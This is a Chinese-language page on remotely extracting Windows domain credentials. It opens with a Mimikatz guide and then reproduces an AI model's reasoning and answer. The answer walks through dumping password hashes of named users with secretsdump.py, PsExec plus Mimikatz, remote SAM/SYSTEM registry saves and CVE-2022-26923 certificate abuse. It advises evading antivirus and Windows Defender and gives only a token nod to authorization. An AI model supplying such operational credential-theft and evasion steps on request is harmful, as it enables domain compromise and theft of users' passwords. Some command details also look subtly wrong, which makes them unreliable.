mimikatz远程获取域密码

### 关于 Mimikatz 的详细使用指南 #### 一、简介 Mimikatz 是一款功能强大的安全测试工具，主要用于提取 Windows 凭证和其他敏感信息。该工具由 Benjamin Delpy 开发，在渗透测试领域广泛应用。 #### 二、环境准备 为了顺利运行 Mimikatz，需先获取其源码或编译好的可执行文件。通常可以从 GitHub 上找到最新版本的 `mimikatz-master`[^1]。对于初次使用者来说，建议下载预编译版本以简化配置流程。 #### 三、基本操作命令 启动 Mimikatz 后会进入交互式 shell 界面： ```bash privilege::debug sekurlsa::logonpasswords ``` 上述两条指令分别用于提升权限至调试模式并读取当前登录用户的密码哈希值。 #### 四、导出证书的具体方法 当涉及到处理加密相关内容时，可以利用 Mimikatz 提供的功能来管理个人身份验证模块(PKCS#12) 文件: ```bash crypto::capi certificates::export /store:MY /domain:<target_domain> /privatekey:true /file:C:\path\to\output.pfx ``` 这段脚本展示了如何从本地计算机存储中导出指定域下的私钥及其对应的 X.509 证书到 PFX 文件内。 #### 五、通过 Docker 使用 Evil-WinRM 结合 Mimikatz 如果希望在一个隔离环境中部署这些工具，则可以通过容器化的方式实现。例如，借助预先打包好所有依赖项的镜像快速搭建实验平台： ```bash docker pull oscarakaelvis/evil-winrm docker run --rm -ti \ --name evil-winrm \ -v $(pwd):/root/.ssh \ oscarakaelvis/evil-winrm \ -i <目标IP地址> \ -u 用户名 \ -p '密码' ``` 一旦成功连接远程主机之后就可以继续加载 mimikatz.dll 并按照前述方式执行相应动作了[^2]。

<think>好的，我现在需要帮助用户获取远程主机上指定用户wangan01至wangan05的哈希值。首先，我需要考虑用户的使用场景和技术背景。用户可能是一位系统管理员或安全研究人员，负责维护或测试网络的安全性。他们需要提取哈希值可能用于密码审计、安全测试或恢复账户访问权限。 接下来，我需要确定用户可能使用的工具和方法。根据提供的引用内容，特别是引用[2]提到的CVE-2022-26923漏洞和横向移动技术，用户可能对利用漏洞进行域控提权感兴趣。此外，引用[3]提到处理doc文件和隐写术，但这里可能不直接相关，不过用户可能有其他隐藏数据的需求，但当前问题主要集中在哈希提取。 首先，常见的提取哈希值的方法包括使用Mimikatz、SAM数据库提取、使用PowerShell模块如DSInternals，或者利用漏洞利用工具如Impacket中的secretsdump.py。用户提到了Python脚本和exe工具，引用[2]中提到有Python脚本和C的exe工具，这可能是指Impacket或类似工具。 用户需要远程提取哈希，所以需要考虑远程执行的方法。如果目标主机是域控制器，可能涉及域控提权漏洞，如CVE-2022-26923，但该漏洞主要用于权限提升，可能需先获得初始访问权限。或者，如果用户已经具备一定的权限，可以通过横向移动技术来提取哈希。 步骤可能包括： 1. 获取远程主机的管理员权限，比如通过漏洞利用或已有凭证。 2. 使用工具如Mimikatz的sekurlsa::logonpasswords命令来提取内存中的哈希，但需要远程执行。 3. 使用Impacket的secretsdump.py脚本，通过有效的凭证（如域管理员账户）远程转储哈希值。 4. 如果无法远程执行，可能需要先通过PsExec或WMI等方式在目标主机上运行命令，再获取结果。 用户可能需要具体的命令示例，比如如何调用secretsdump.py来获取特定用户的哈希。同时需要注意法律和授权问题，确保操作合法。 还需要考虑用户可能遇到的障碍，例如防病毒软件拦截Mimikatz，或者目标系统配置了Credential Guard等安全措施，这时候可能需要其他方法，如卷影复制提取NTDS.dit文件，或使用DCSync攻击。 最后，根据引用内容，用户可能有兴趣了解如何结合CVE-2022-26923漏洞进行提权后再提取哈希，因此需要分步骤说明可能的攻击链。</think>### 分步解决方案：获取远程主机用户哈希值 #### 方法一：使用Impacket工具包（Python脚本） 1. **前提条件**：需具备域管理员权限或本地管理员凭证 2. **操作步骤： ```bash # 使用secretsdump.py提取所有用户哈希 python3 secretsdump.py DOMAIN/USER:PASSWORD@TARGET_IP -just-dc-user 'wangan0[1-5]' # 指定单个用户示例 python3 secretsdump.py domain/wangan01:[email protected] ``` *注：该工具可自动识别域控架构，支持正则表达式匹配用户名[^2]* #### 方法二：通过Mimikatz远程执行 1. **建立远程连接**： ```powershell # 使用PsExec获取交互式会话 psexec \\TARGET_IP -u Administrator -p AdminPass cmd ``` 2. **提取哈希： ```powershell privilege::debug sekurlsa::logonpasswords ``` *注意：需绕过防病毒软件检测，建议使用内存加载方式[^1]* #### 方法三：注册表提取SAM文件 1. **远程获取SAM/SYSTEM文件： ```bash reg save HKLM\SAM \\TARGET_IP\C$\temp\sam.save reg save HKLM\SYSTEM \\TARGET_IP\C$\temp\system.save ``` 2. **本地解析哈希： ```bash python3 secretsdump.py -sam sam.save -system system.save LOCAL ``` #### 方法四：利用CVE-2022-26923漏洞 1. **漏洞利用步骤**： ```bash # 生成伪造证书 python3 ADCSPwn.py --target dc.example.com --username wangan01 # 提取域控哈希 certipy-ad auth -pfx administrator.pfx -dc-ip 192.168.1.1 ``` *该漏洞可直接获取域管理员权限，进而提取所有用户哈希* ### 注意事项 1. 所有操作需获得合法授权 2. 建议在隔离环境测试工具 3. 注意Windows Defender等防护软件的绕过技术 4. 哈希提取后应立即进行脱敏处理